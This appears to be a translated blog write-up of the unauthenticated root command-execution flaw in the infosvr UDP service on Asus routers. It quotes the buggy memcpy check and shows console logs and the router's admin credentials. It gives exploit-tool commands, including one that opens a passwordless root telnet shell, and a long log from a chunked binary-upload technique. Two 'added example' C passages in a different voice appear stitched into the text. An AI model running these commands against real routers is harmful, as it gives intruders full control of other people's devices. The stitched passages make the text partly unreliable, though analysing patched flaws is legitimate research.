Exploiting root vulnerability in Asus routers

In early 2015, Asus fixed a critical vulnerability in its routers. The "hole" was in a service called infosvr, which the Asus utilities use to simplify configuring the router by automatically detecting it on the local network. The vulnerability allowed executing arbitrary commands with root privileges (after all, infosvr itself runs as root), which gave an attacker full control over the system.

But Asus has released patched firmware, so it's all in the past now. Or is it? Hmm... How often do ordinary people actually update the firmware on their routers?



Details, the discovery history, research, instructions and... exploits below the cut.

What's the matter?


The infosvr service listens on UDP port 9999. When a packet of at least 512 bytes arrives, it parses it and, depending on the packet type, performs the corresponding action. For example, it collects information about some of the router's settings and sends it to the Device Discovery program, which helps find the router's IP address. But there is also a packet type that makes the router execute a system command. This is where the Asus developers screwed up: because of an error in the code that handles this packet type, the command can be executed without any authorization. The culprit is the line if (memcpy(phdr_ex->MacAddress, mac, 6)==0) in the following listing (non-essential lines removed):

Part of the function processPacket(int sockfd, char *pdubuf) from common.c
if (phdr->OpCode!=NET_CMD_ID_GETINFO && phdr->OpCode!=NET_CMD_ID_GETINFO_MANU)
{
	phdr_ex = (IBOX_COMM_PKT_HDR_EX *)pdubuf;
	// Check Mac Address
	if (memcpy(phdr_ex->MacAddress, mac, 6)==0)
	{
		_dprintf("Mac Error %2x%2x%2x%2x%2x%2x\n",
			(unsigned char)phdr_ex->MacAddress[0],
			(unsigned char)phdr_ex->MacAddress[1],
			(unsigned char)phdr_ex->MacAddress[2],
			(unsigned char)phdr_ex->MacAddress[3],
			(unsigned char)phdr_ex->MacAddress[4],
			(unsigned char)phdr_ex->MacAddress[5]
		);
		return NULL;
	}
	phdr_res->Info = phdr_ex->Info;
	memcpy(phdr_res->MacAddress, phdr_ex->MacAddress, 6);
}


Probably memcmp was meant instead of memcpy (this is what happens when you copy lines of code intending to tweak them later), and != instead of ==. As it stands, memcpy returns its destination pointer, which is never NULL, so the check never fails and every packet passes. But even without this error, knowing the MAC address would still be enough to get in.

After this successful "authentication" the command from the packet is executed:

The same function, a little further down:
switch(phdr->OpCode)
{
	case NET_CMD_ID_MANU_CMD:
		#define MAXSYSCMD 256
		char cmdstr[MAXSYSCMD];
		PKT_SYSCMD *syscmd;
		syscmd = (PKT_SYSCMD *)(pdubuf+sizeof(IBOX_COMM_PKT_HDR_EX));
		if (syscmd->len>=MAXSYSCMD) syscmd->len=MAXSYSCMD;
		syscmd->cmd[syscmd->len]=0;
		syscmd->len=strlen(syscmd->cmd);
		fprintf(stderr,"system cmd: %d %s\n", syscmd->len, syscmd->cmd);
		sprintf(cmdstr, "%s > /tmp/syscmd.out", syscmd->cmd);
		system(cmdstr);



Now, how about a quest?

  • Go here
  • Pick any router
  • Follow the path Support -> Drivers and Utilities -> OS -> Firmware
  • Look for the firmware dated January 2015 in the list
  • In its description you will probably find the terse phrase "Fixed infosvr security issue."
  • ???
  • !!!

Impressive scale? Actually it wasn't all that bad (and now that the "hole" has been closed, it's fine). The point is that infosvr binds to the br0 interface, i.e. the bridge between the other interfaces. When the router works in IP Sharing mode (shared IP mode), br0 combines eth0 and wlan0. Note that eth1 (the WAN) is not included. So at least nobody can get in from the external network. But when the router is in Access Point mode, br0 bridges all the interfaces...

Discovery history


At some point I wanted to control my router over UART, that is, through the hardware console. "Why go to such lengths? Just use telnet," you say. Not so fast! This is an RT-N10E (a.k.a. RT-N10LX)!

Do you see a telnet switch here? Me neither.


Later I found out that it can be done like this:
192.168.1.1/telnetd.cgi?enable=1



I won't say much about how crappy this router is. Those who have dealt with it know. For the lucky ones who never had to bother with it, I'll say that the Asus RT-xxxE (or RT-xxxLX) routers use a Realtek processor, for which there is no alternative firmware! Although the community is trying. On the official firmware I used PPTP a couple of years ago: constant freezes, disconnects and other joys. PPPoE did not come up at all at first (fixed in some later firmware). Now this router works simply as a bridge between WiFi and Ethernet.

Learn more about the differences between RT-xxxE and RT-xxxLX
The difference between Asus RT-N10E and Asus RT-N10LX
In fact this is the same router: the Asus RT-N10LX has a 2 dBi antenna, the RT-N10E a 5 dBi one. The RT-N10LX specifications additionally list IEEE 802.11d, which only means that the router takes regional regulatory restrictions into account, hence the weaker antenna. Personally I came across a unit (built in 2012) with the small 2 dBi antenna, while all the markings on the router and the box say it is an RT-N10E, not an RT-N10LX. If you look carefully at the official website, it says: "Antenna type will differ according to local regulations and requirement in each country" and "This model sells only in EU, China, and South America". As they say, same thing, different angle. The firmware for these two models is the same.

Difference between Asus RT-N10E / LX and RT-N12E / LX
The 12th model has the same processor but a different controller, the RTL8192CE, which allows 2x MIMO and theoretically provides up to 300 Mbps. The difference between the RT-N12E and RT-N12LX versions is in the antennas.

Difference between Asus RT-N10E / LX and Asus RT-N10
ASUS also has the RT-N10 and RT-N12 routers. It is important to understand that these are different devices, built on Broadcom chips. For the RT-N10 and RT-N12 there is alternative firmware from enthusiasts, including the one "from Oleg". Be careful when buying!
Source


So, I connected to the UART.

Connect to UART


Power on. We see the boot process. (Captain Obvious: by the way, you won't see this over telnet.)
This is what the router's boot looks like on /dev/console (/dev/ttyS0)
========== SPI ==============
SDRAM CLOCK: 156MHZ
- Force into Single IO Mode - | No chipID Sft chipSize blkSize secSize pageSize sdCk opCk chipName |
| 0 ef4016h 0h 400000h 10000h 1000h 100h 104 39 W25Q32 |
- --- RealTek (RTL8196C) at 2012.04.09-16: 54 + 0800 version v1.1f [16bit] (390MHz)

#### return_addr: 0x05010000, root_bin_offset: 0x050dd012
Jump to image start = 0x80500000 ...
decompressing kernel:
Uncompressing Linux ... done, booting the kernel.
done decompressing kernel.
start address: 0x80003600
RTL8192C / RTL8188C driver version 1.6 (2011-07-18)

Probing RTL8186 10/100 NIC-kenel stack size order [2] ...
chip name: 8196C, chip revid: 4
NOT YET
eth0 added. vid = 9 Member port 0x10 ...
eth1 added. vid = 8 Member port 0x1 ...
eth2 added. vid = 9 Member port 0x2 ...
eth3 added. vid = 9 Member port 0x4 ...
eth4 added. vid = 9 Member port 0x8 ...
[peth0] added, mapping to [eth1] ...
init started: BusyBox v1.13.4 (2014-09-18 18:01:50 CST)

## flash.c free apmib ##
Init Start ...

## system / sysconf.c free apmib ##

## flash.c free apmib ##
===== Set parameter for BSMI test =====
Init bridge interface ...
syslog will use 64KB for log (7 rotate, 1 original, 8KB for each)
Init Wlan application ...

## flash.c free apmib ##

## flash.c free apmib ##
Init Firewall Rules ...
No wan ip currently!
Init WAN Interface ...
start_wan: sysop 0 wan_iface eth1 lan_iface br0 wisp_id 0 act_source 1
set_dhcp_client: sysop 0 wan_iface eth1 lan_iface br0 wisp_id 0 act_source 1
start_wan_dhcp_client: iface eth1
No

such.07 MiniDIGI 07.07.17 05.07.21 05.07.21 .

System TZ ENV = GMT-2
Restart networkmap

## system / sysconf.c free apmib ##
start infosvr
router ip = 192.168.1.1
mac addr = 50: 46: 5d: 86: 76: fc
WLAN0_WLAN_DISABLED = 0 ## flash.c free apmib ##
sh: ## flash.c: unknown operand
# Start wanduck!
Start httpd!

# 1: Enable direct rule

After boot completed, I started exploring the system: software versions, hardware and other information that can be obtained from the console. But more on that later.

It is interesting to watch the reaction to standard user actions such as pressing the WPS button, configuring via the web interface, using Asus Utility... Indeed, the corresponding information appeared on the console. One fact deserves special mention: when you try to open the web interface, httpd (presumably) writes the login and password used to log in to /dev/console (/dev/ttyS0)!
UserID: admin
UserPass: asus-rt
True, this does not show up on telnet (/dev/ttyp0).

Of the whole Asus Utility package (Device Discovery, Router Setup Wizard and Firmware Restoration), only the Router Setup Wizard produced any output on the console. Namely, when you start the application and click the "Next" button, the following lines appear:
system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1

system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1

system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1

system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1

system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1

system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1

system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1

system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1

Hmm...
Does the Router Setup Wizard send these commands? I checked in Wireshark: yes, RSW transmits these commands in UDP packets. But what if we replace them with our own?

It turns out I'm not the first

Before I started digging myself, I decided to google first. And google turned something up (one and two). The second link has a detailed description of the vulnerability and a simple exploit for Linux (there is also a Python one).

AsusCmd: reinventing the wheel


I wanted a program like that for Windows, since that is what I use 95% of the time. I don't want to boot an Ubuntu virtual machine just to execute a single command.

Sizes

While writing and debugging the exploit, and digging through the infosvr sources, the "parameters" of this "hole" became clear.
Namely, its size. It is as follows:
The receive and send buffers are 420 bytes each. That would be fine, but in reality the router can only send 420 bytes in response. Reception is even worse. After infosvr receives a command, it truncates it to 256 characters and only then executes it. But that is not the last limitation. When executing a command just under 256 characters long, infosvr crashes with a segmentation fault. The command completes, but there will be no reply and no way to execute anything else. Empirically, the maximum safe length of a user command was found to be 238 characters. So the size of the "hole": 238 for the command, 420 for the reply.

Details (with an example)
infosvr calls
system("echo \"Some text\" > /var/myText; cat /var/myText > /tmp/syscmd.out");

Here the full command is:
'echo "Some text" > /var/myText; cat /var/myText > /tmp/syscmd.out'

Where:
'echo "Some text" > /var/myText; cat /var/myText'
- is the command sent by the user via AsusCmd;
' > /tmp/syscmd.out'
- is hardcoded in the infosvr code.

By the way, why redirect to /tmp/syscmd.out at all? Because it is this file that is then read into the 420-byte buffer and sent back as the response to the command.

The "safe length limit" refers specifically to the user command.

I.e. with a user command of 238 characters, the full command is 238 + 18 = 256. Maybe the developers wanted to avoid infosvr crashes by truncating the command to 256 characters? It looks like they did not account for strlen(" > /tmp/syscmd.out") when sprintf'ing the result into the 256-byte cmdstr.
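As an added example (my own code, not Asus's and not the author's tool), here is a small C model of the two defects in the processPacket listing above, the memcpy "check" and the sprintf into the 256-byte cmdstr, next to bounded versions; the struct-free signatures are my simplification, while MAXSYSCMD, the redirect suffix and the router MAC come from the post. The strict fit computed here is 237 characters (255 usable bytes minus the 18-character suffix), one less than the 238 the author found safe empirically.

```c
#include <stdio.h>
#include <string.h>

#define MAXSYSCMD 256                         /* from the infosvr listing */
#define REDIRECT_SUFFIX " > /tmp/syscmd.out"  /* hardcoded in infosvr, 18 chars */

/* The check as shipped. memcpy() returns its destination pointer, which is
 * never NULL, so "== 0" never holds: every packet is "authenticated", and as
 * a side effect the packet's MAC field is overwritten with the router's MAC.
 * Returns 1 if the packet would be accepted. */
int mac_check_shipped(unsigned char *pkt_mac, const unsigned char *router_mac)
{
    void *r = memcpy(pkt_mac, router_mac, 6);
    if (r == 0)
        return 0;   /* the "Mac Error" branch: unreachable */
    return 1;
}

/* What the code evidently meant: compare and reject on mismatch. This is
 * still only a MAC check; as the post notes, knowing the MAC is enough, so
 * it gates nothing against a host on the same LAN segment. */
int mac_check_intended(const unsigned char *pkt_mac, const unsigned char *router_mac)
{
    return memcmp(pkt_mac, router_mac, 6) == 0;
}

/* infosvr truncates cmd to MAXSYSCMD and then sprintf()s cmd + suffix into
 * a MAXSYSCMD-byte stack buffer. The longest user command that fits together
 * with the terminating NUL is MAXSYSCMD - 1 - strlen(suffix). */
size_t max_user_cmd_len(void)
{
    return MAXSYSCMD - 1 - strlen(REDIRECT_SUFFIX);   /* 256 - 1 - 18 = 237 */
}

/* Bounded replacement for the sprintf(): refuses instead of overflowing.
 * Returns the length written, or -1 if cmd + suffix does not fit in outsz. */
int build_cmdstr_bounded(char *out, size_t outsz, const char *cmd)
{
    int n = snprintf(out, outsz, "%s%s", cmd, REDIRECT_SUFFIX);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return n;
}

/* Router MAC as printed in the boot log above ("mac addr = 50:46:5d:86:76:fc"). */
static const unsigned char ROUTER_MAC[6] = {0x50, 0x46, 0x5d, 0x86, 0x76, 0xfc};

/* 1 if the shipped check lets a packet with a (constructed) wrong MAC through. */
int shipped_check_accepts_wrong_mac(void)
{
    unsigned char pkt_mac[6] = {1, 2, 3, 4, 5, 6};   /* constructed */
    return mac_check_shipped(pkt_mac, ROUTER_MAC);
}

/* 1 if the intended check rejects the same packet. */
int intended_check_rejects_wrong_mac(void)
{
    unsigned char pkt_mac[6] = {1, 2, 3, 4, 5, 6};   /* constructed */
    return !mac_check_intended(pkt_mac, ROUTER_MAC);
}

/* Length cmdstr ends up with for a user command of cmd_len 'A's,
 * or -1 when the bounded builder refuses it. */
int cmdstr_len_for(size_t cmd_len)
{
    char cmd[MAXSYSCMD + 32];
    char out[MAXSYSCMD];
    if (cmd_len >= sizeof cmd)
        return -1;
    memset(cmd, 'A', cmd_len);
    cmd[cmd_len] = '\0';
    return build_cmdstr_bounded(out, sizeof out, cmd);
}

int main(void)
{
    printf("shipped check accepts wrong MAC: %d\n", shipped_check_accepts_wrong_mac());
    printf("max user cmd: %zu, 237 -> %d, 238 -> %d\n",
           max_user_cmd_len(), cmdstr_len_for(237), cmdstr_len_for(238));
    return 0;
}
```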


The exploit is written and debugged. You can use it .

Work example


But it is not very convenient to control a router this way. And while the 238-character command limit is not that noticeable here, the 420-character limit on the reply is sadder. But there is a way! Although the busybox on the router is heavily trimmed, it still has telnetd! It is better to run it on a non-standard port, since there is no protection at all: no password is needed to connect.
AsusCmd.exe "telnetd -l /bin/sh -p777"
Well, now that is a different matter! You can work with all the conveniences, such as command history and Tab completion. If telnet stops responding, it can be restarted without rebooting the router. First you need to kill the sh associated with it:
AsusCmd.exe "killall -9 sh"
Note that after this command the sh attached to /dev/console is killed as well. Now telnetd can be started again.

Excellent. Is that the end of it? Not quite.

The banquet continues


So, we can use all the available commands. We can create and delete files in writable directories (the ramfs at /var). We can write a long text file containing several commands. But not only text! After all, echo on Linux can turn text into binary data! This means we can upload the programs we are missing to the router!

AsusBinWrite

The idea is simple:
  • read a portion of bytes from the source file
  • convert them into a textual form that 'echo -e' understands
  • build a system command from it
  • send it to the router
  • repeat until the whole file has been transferred


But it is all easy and simple only in words. In practice we are dealing with a couple of unpleasant factors:
  • UDP packets are sometimes lost
  • the useful length of a system command is limited (238 characters)


The command-length limit is straightforward: you just have to send more packets. The downside is that transfer speed suffers, because the router's processor has to handle many small packets, i.e. the transfer rate is directly proportional to the router's CPU speed. (Checked with cpuload: while AsusBinWrite is running, the router's CPU is 100% loaded.)

UDP is more complicated. The correctness of the transfer has to be verified somehow. The primitive approach, simply appending the next bytes to the end of the file, is no good: if a single packet is lost or duplicated on its way to the router, the file is already corrupt. So the decision was made to first write the individual parts to separate files and verify their contents, and only then combine them. One more thing: they should not be combined at the very end, but after a certain number of transferred parts, because one part does not occupy, say, 40 bytes of memory (the part's file size) but a whole 4 KB (a page). And what if there are a thousand parts? No amount of RAM would suffice (the RT-N10E has only 16 MB). After a successful merge (success is checked by the growth of the target file size on the router), these parts are deleted. And so, in a loop, the whole file is transferred to the end.
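To see where the part sizes and command lengths in the log below come from, here is an added C model of the per-part command budget (my own code, not AsusBinWrite): each raw byte becomes a 4-character \xNN escape inside echo -ne "...">/var/ldd_<batch>-<idx>;cat /var/ldd_<batch>-<idx>, and the whole command must stay within the 238-character cap. The temp-file naming with 100 parts per batch is an assumption read off the console log (ldd_0-1 ... ldd_0-100, then 49-byte parts again at part 101); the 10084-byte file size is the final merge total in the log.

```c
#include <stdio.h>
#include <string.h>

#define CMD_CAP 238          /* safe user-command length found in the post */
#define ESC_LEN 4            /* one raw byte -> "\xNN" for echo -ne */
#define PARTS_PER_BATCH 100  /* assumption read off the log (see lead-in) */
#define LDD_SIZE 10084       /* final size of /var/ldd in the log, bytes */

/* Temp-file name for global part number n (1-based): <target>_<batch>-<idx>.
 * The batch/idx split is my assumption; it reproduces ldd_0-1..ldd_0-100 and
 * the return to 49-byte parts at part 101. */
static void part_name(const char *target, unsigned n, char *out, size_t outsz)
{
    snprintf(out, outsz, "%s_%u-%u", target,
             (n - 1) / PARTS_PER_BATCH, (n - 1) % PARTS_PER_BATCH + 1);
}

/* Characters in a part command that are not payload:
 *   echo -ne "<payload>">/var/ldd_0-1;cat /var/ldd_0-1
 * (the trailing cat is what makes the router echo the part back for checking). */
size_t part_cmd_overhead(const char *target, unsigned n)
{
    char name[64], cmd[192];
    part_name(target, n, name, sizeof name);
    return (size_t)snprintf(cmd, sizeof cmd, "echo -ne \"\">%s;cat %s", name, name);
}

/* Raw bytes that fit into part n under the command cap. */
size_t part_capacity(const char *target, unsigned n)
{
    size_t ov = part_cmd_overhead(target, n);
    return ov >= CMD_CAP ? 0 : (CMD_CAP - ov) / ESC_LEN;
}

/* Command length for part n carrying nbytes raw bytes. */
size_t part_cmd_len(const char *target, unsigned n, size_t nbytes)
{
    return part_cmd_overhead(target, n) + nbytes * ESC_LEN;
}

/* Walk a file of 'size' bytes through the scheme with no loss. Returns the
 * part count; *last gets the final part's payload, *batch0 the bytes carried
 * by parts 1..100 (the running total the log prints after the merges). */
unsigned plan_transfer(const char *target, size_t size, size_t *last, size_t *batch0)
{
    unsigned n = 0;
    size_t sent = 0;
    *last = 0;
    *batch0 = 0;
    while (sent < size) {
        size_t c = part_capacity(target, ++n);
        if (c == 0)
            return 0;                       /* name alone exceeds the cap */
        if (c > size - sent)
            c = size - sent;
        sent += c;
        *last = c;
        if (n == PARTS_PER_BATCH)
            *batch0 = sent;
    }
    return n;
}

/* Scalar views of the /var/ldd run, for checking against the log. */
unsigned ldd_parts_needed(void)
{
    size_t l, b;
    return plan_transfer("/var/ldd", LDD_SIZE, &l, &b);
}
size_t ldd_last_part_bytes(void)
{
    size_t l, b;
    plan_transfer("/var/ldd", LDD_SIZE, &l, &b);
    return l;
}
size_t ldd_bytes_after_batch0(void)
{
    size_t l, b;
    plan_transfer("/var/ldd", LDD_SIZE, &l, &b);
    return b;
}

int main(void)
{
    size_t c1 = part_capacity("/var/ldd", 1);
    printf("part 1: %zu B, cmd %zu ch\n", c1, part_cmd_len("/var/ldd", 1, c1));
    printf("/var/ldd: %u parts, last part %zu B, after part 100: %zu B\n",
           ldd_parts_needed(), ldd_last_part_bytes(), ldd_bytes_after_batch0());
    return 0;
}
```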

Example of transferring an executable file

To better understand how it works, I suggest looking at what happens on /dev/console (/dev/ttyS0) during a file transfer and comparing it with the output of AsusBinWrite itself.

AsusBinWrite output (note cases of packet loss)
Start uploading file to 255.255.255.255 ...
Source file: 'Useful\ldd' Target file: '/var/ldd'
0.5% 742.4 Bps part 1 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.0% 106.5 Bps part 2 (49 B; cmd: 237 ch) LOST
1.0% 32.7 Bps part 2 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.5% 347.5 Bps part 3 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.9% 159.1 Bps part 4 (49 B; cmd: 237 ch) 192.168.1.1: OK
2.4% 150.3 Bps part 5 (49 B; cmd: 237 ch) LOST
2.4% 32.2 Bps part 5 (49 B; cmd: 237 ch) 192.168.1.1: OK
2.9% 376.9 Bps part 6 (49 B; cmd: 237 ch) LOST
2.9% 32.6 Bps part 6 (49 B; cmd: 237 ch) 192.168.1.1: OK
3.4% 401.6 Bps part 7 (49 B; cmd: 237 ch) 192.168.1.1: OK
3.9% 146.3 Bps part 8 (49 B; cmd: 237 ch) 192.168.1.1: OK
4.4% 102.3 Bps part 9 (49 B; cmd: 237 ch) 192.168.1.1: OK
4.8% 150.0 Bps part 10 (48 B; cmd: 235 ch) 192.168.1.1: OK
5.3% 176.5 Bps part 11 (48 B; cmd: 235 ch) 192.168.1.1: OK
5.8% 120.9 Bps part 12 (48 B; cmd: 235 ch) 192.168.1.1: OK
6.3% 145.5 Bps part 13 (48 B; cmd: 235 ch) 192.168.1.1: OK
6.8% 144.6 Bps part 14 (48 B; cmd: 235 ch) LOST
6.8% 31.7 Bps part 14 (48 B; cmd: 235 ch) 192.168.1.1: OK
7.2% 285.7 Bps part 15 (48 B; cmd: 235 ch) 192.168.1.1: OK
7.7% 147.7 Bps part 16 (48 B; cmd: 235 ch) LOST
7.7% 32.0 Bps part 16 (48 B; cmd: 235 ch) 192.168.1.1: OK
8.2% 333.3 Bps part 17 (48 B; cmd: 235 ch) 192.168.1.1: OK
8.7% 146.3 Bps part 18 (48 B; cmd: 235 ch) 192.168.1.1: OK
9.1% 148.1 Bps part 19 (48 B; cmd: 235 ch) 192.168.1.1: OK
9.6% 141.6 Bps part 20 (48 B; cmd: 235 ch) 192.168.1.1: OK
10.1% 145.0 Bps part 21 (48 B; cmd: 235 ch) 192.168.1.1: OK
10.6% 145.5 Bps part 22 (48 B; cmd: 235 ch) 192.168.1.1: OK
11.0% 148.1 Bps part 23 (48 B; cmd: 235 ch) 192.168.1.1: OK
11.5% 145.9 Bps part 24 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.0% 137.5 Bps part 25 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.5% 146.3 Bps part 26 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.9% 151.9 Bps part 27 (48 B; cmd: 235 ch) 192.168.1.1: OK
13.4% 172.0 Bps part 28 (48 B; cmd: 235 ch) 192.168.1.1: OK
13.9% 126.0 Bps part 29 (48 B; cmd: 235 ch) 192.168.1.1: OK
14.4% 173.3 Bps part 30 (48 B; cmd: 235 ch) LOST
14.4% 31.7 Bps part 30 (48 B; cmd: 235 ch) 192.168.1.1: OK
14.8% 358.2 Bps part 31 (48 B; cmd: 235 ch) 192.168.1.1: OK
15.3% 144.6 Bps part 32 (48 B; cmd: 235 ch) 192.168.1.1: OK
15.8% 149.5 Bps part 33 (48 B; cmd: 235 ch) 192.168.1.1: OK
16.3% 137.1 Bps part 34 (48 B; cmd: 235 ch) 192.168.1.1: OK
16.7% 153.8 Bps part 35 (48 B; cmd: 235 ch) 192.168.1.1: OK
17.2% 138.7 Bps part 36 (48 B; cmd: 235 ch) 192.168.1.1: OK
17.7% 145.5 Bps part 37 (48 B; cmd: 235 ch) 192.168.1.1: OK
18.2% 140.4 Bps part 38 (48 B; cmd: 235 ch) 192.168.1.1: OK
18.7% 154.3 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 32.0 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 32.0 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 31.6 Bps part 39 (48 B; cmd: 235 ch) 192.168.1.1: OK
19.1% 428.6 Bps part 40 (48 B; cmd: 235 ch) 192.168.1.1: OK
19.6% 175.2 Bps part 41 (48 B; cmd: 235 ch) 192.168.1.1: OK
20.1% 120.6 Bps part 42 (48 B; cmd: 235 ch) 192.168.1.1: OK
20.6% 146.3 Bps part 43 (48 B; cmd: 235 ch) 192.168.1.1: OK
21.0% 150.0 Bps part 44 (48 B; cmd: 235 ch) 192.168.1.1: OK
21.5% 145.0 Bps part 45 (48 B; cmd: 235 ch) LOST
21.5% 31.0 Bps part 45 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.0% 363.6 Bps part 46 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.5% 137.9 Bps part 47 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.9% 154.3 Bps part 48 (48 B; cmd: 235 ch) 192.168.1.1: OK
23.4% 145.0 Bps part 49 (48 B; cmd: 235 ch) LOST
23.4% 31.9 Bps part 49 (48 B; cmd: 235 ch) 192.168.1.1: OK
23.9% 360.9 Bps part 50 (48 B; cmd: 235 ch) LOST
23.9% 31.8 Bps part 50 (48 B; cmd: 235 ch) 192.168.1.1: OK
24.4% 345.3 Bps part 51 (48 B; cmd: 235 ch) 192.168.1.1: OK
24.8% 151.4 Bps part 52 (48 B; cmd: 235 ch) LOST
24.8% 31.6 Bps part 52 (48 B; cmd: 235 ch) 192.168.1.1: OK
25.3% 342.9 Bps part 53 (48 B; cmd: 235 ch) 192.168.1.1: OK
25.8% 145.0 Bps part 54 (48 B; cmd: 235 ch) 192.168.1.1: OK
26.3% 151.4 Bps part 55 (48 B; cmd: 235 ch) 192.168.1.1: OK
26.7% 145.5 Bps part 56 (48 B; cmd: 235 ch) 192.168.1.1: OK
27.2% 147.7 Bps part 57 (48 B; cmd: 235 ch) 192.168.1.1: OK
27.7% 143.7 Bps part 58 (48 B; cmd: 235 ch) 192.168.1.1: OK
28.2% 142.9 Bps part 59 (48 B; cmd: 235 ch) 192.168.1.1: OK
28.6% 142.9 Bps part 60 (48 B; cmd: 235 ch) 192.168.1.1: OK
29.1% 149.1 Bps part 61 (48 B; cmd: 235 ch) 192.168.1.1: OK
29.6% 142.4 Bps part 62 (48 B; cmd: 235 ch) 192.168.1.1: OK
30.1% 142.9 Bps part 63 (48 B; cmd: 235 ch) 192.168.1.1: OK
30.6% 145.9 Bps part 64 (48 B; cmd: 235 ch) 192.168.1.1: OK
31.0% 148.1 Bps part 65 (48 B; cmd: 235 ch) 192.168.1.1: OK
31.5% 144.6 Bps part 66 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.0% 141.2 Bps part 67 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.5% 142.9 Bps part 68 (48 B; cmd: 235 ch) 192.168.1.1: OK
32.9% 151.4 Bps part 69 (48 B; cmd: 235 ch) 192.168.1.1: OK
33.4% 143.7 Bps part 70 (48 B; cmd: 235 ch) 192.168.1.1: OK
33.9% 146.8 Bps part 71 (48 B; cmd: 235 ch) 192.168.1.1: OK
34.4% 183.9 Bps part 72 (48 B; cmd: 235 ch) 192.168.1.1: OK
34.8% 144.1 Bps part 73 (48 B; cmd: 235 ch) 192.168.1.1: OK
35.3% 117.1 Bps part 74 (48 B; cmd: 235 ch) 192.168.1.1: OK
35.8% 144.6 Bps part 75 (48 B; cmd: 235 ch) 192.168.1.1: OK
36.3% 144.6 Bps part 76 (48 B; cmd: 235 ch) 192.168.1.1: OK
36.7% 151.4 Bps part 77 (48 B; cmd: 235 ch) 192.168.1.1: OK
37.2% 172.0 Bps part 78 (48 B; cmd: 235 ch) 192.168.1.1: OK
37.7% 119.7 Bps part 79 (48 B; cmd: 235 ch) 192.168.1.1: OK
38.2% 143.7 Bps part 80 (48 B; cmd: 235 ch) 192.168.1.1: OK
38.6% 151.9 Bps part 81 (48 B; cmd: 235 ch) 192.168.1.1: OK
39.1% 143.7 Bps part 82 (48 B; cmd: 235 ch) 192.168.1.1: OK
39.6% 146.8 Bps part 83 (48 B; cmd: 235 ch) 192.168.1.1: OK
40.1% 183.9 Bps part 84 (48 B; cmd: 235 ch) 192.168.1.1: OK
40.5% 117.1 Bps part 85 (48 B; cmd: 235 ch) 192.168.1.1: OK
41.0% 142.9 Bps part 86 (48 B; cmd: 235 ch) 192.168.1.1: OK
41.5% 147.2 Bps part 87 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.0% 179.1 Bps part 88 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.5% 145.5 Bps part 89 (48 B; cmd: 235 ch) 192.168.1.1: OK
42.9% 136.8 Bps part 90 (48 B; cmd: 235 ch) 192.168.1.1: OK
43.4% 120.0 Bps part 91 (48 B; cmd: 235 ch) 192.168.1.1: OK
43.9% 151.9 Bps part 92 (48 B; cmd: 235 ch) 192.168.1.1: OK
44.4% 143.3 Bps part 93 (48 B; cmd: 235 ch) 192.168.1.1: OK
44.8% 146.3 Bps part 94 (48 B; cmd: 235 ch) 192.168.1.1: OK
45.3% 145.9 Bps part 95 (48 B; cmd: 235 ch) 192.168.1.1: OK
45.8% 138.7 Bps part 96 (48 B; cmd: 235 ch) 192.168.1.1: OK
46.3% 151.4 Bps part 97 (48 B; cmd: 235 ch) LOST
46.3% 31.8 Bps part 97 (48 B; cmd: 235 ch) 192.168.1.1: OK
46.7% 436.4 Bps part 98 (48 B; cmd: 235 ch) 192.168.1.1: OK
47.2% 138.7 Bps part 99 (48 B; cmd: 235 ch) LOST
47.2% 32.0 Bps part 99 (48 B; cmd: 235 ch) 192.168.1.1: OK
47.7% 378.0 Bps part 100 (48 B; cmd: 237 ch) 192.168.1.1: OK
Merging to /var/ldd parts 1..16 (16 pcs; cmd: 238 ch) ... OK (1545 B)
Merging to /var/ldd parts 33..48 (16 pcs; cmd: 238 ch) ... OK (2313 B)
Merging to /var/ldd parts 49..64 (16 pcs; cmd: 238 ch) ... OK (3081 B)
Merging to /var/ldd parts 65..80 (16 pcs; cmd: 238 ch) ... OK (3849 B)
Merging to /var/ldd parts 81..96 (16 pcs; cmd: 238 ch) ... OK (4617 B)
Merging to /var/ldd parts 97..100 (4 pcs; cmd: 71 ch) ... OK (4809 B)
Written 4.70KB / 9.85KB 77.0 Bps (avg) Remaining: 01:08 (01:02/02:10)

48.2% 5.2 Bps part 101 (49 B; cmd: 237 ch) 192.168.1.1: OK
48.7% 116.7 Bps part 102 (49 B; cmd: 237 ch) 192.168.1.1: OK
49.1% 196.8 Bps part 103 (49 B; cmd: 237 ch) LOST
49.1% 32.7 Bps part 103 (49 B; cmd: 237 ch) 192.168.1.1: OK
49.6% 418.8 Bps part 104 (49 B; cmd: 237 ch) 192.168.1.1: OK
50.1% 138.8 Bps part 105 (49 B; cmd: 237 ch) 192.168.1.1: OK
50.6% 150.8 Bps part 106 (49 B; cmd: 237 ch) 192.168.1.1: OK
51.1% 153.6 Bps part 107 (49 B; cmd: 237 ch) 192.168.1.1: OK
51.6% 151.7 Bps part 108 (49 B; cmd: 237 ch) 192.168.1.1: OK
52.1% 142.4 Bps part 109 (49 B; cmd: 237 ch) 192.168.1.1: OK
52.5% 145.5 Bps part 110 (48 B; cmd: 235 ch) 192.168.1.1: OK
